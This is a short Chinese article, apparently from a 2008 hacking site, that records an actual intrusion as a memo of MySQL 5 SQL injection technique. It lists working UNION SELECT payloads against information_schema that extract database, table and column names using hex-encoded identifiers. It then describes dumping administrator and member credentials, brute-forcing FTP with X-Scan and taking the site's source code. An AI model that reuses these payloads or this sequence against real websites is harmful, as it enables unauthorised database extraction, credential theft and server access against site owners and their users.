一次简单的入侵，权作Mysql5注射备份

2008-8-22 10:57:23
发表时间:
浏览次数:
本站原创
文章来源:
佚名
作者:

找注射点，判断字段数就不提了。
判断下权限，非root连，没有load_file()的权限，不能select into outfile,幸好mysql版本是5.

获取库名

and 1=2 union select 1,2,3,database(),5....,87/*

或者

and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*

and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/*

----------------------------------------------------------------------------------------------
获取表名：

数据库名转换成hex：admin=0x61646D696E

and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*

。。。依次往下爆
------------------------------------------------------------------------------------------------
获取字段值：
表 admin=0x61646D696E
and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/*

---------------------------------------------------------------------------------------------------

爆出管理员帐号后，发现登录不了后台。于是又爆了10套member帐号。整理了下帐号和口令，扔xscan跑ftp口令，2分钟后拿到ftp权限。只是要源代码，到此收工。没技术含量！

上一篇文章：入侵检测三级跳解析跳板技术
下一篇文章： Microsoft SQL Server SA权限最新入侵方法

推荐导读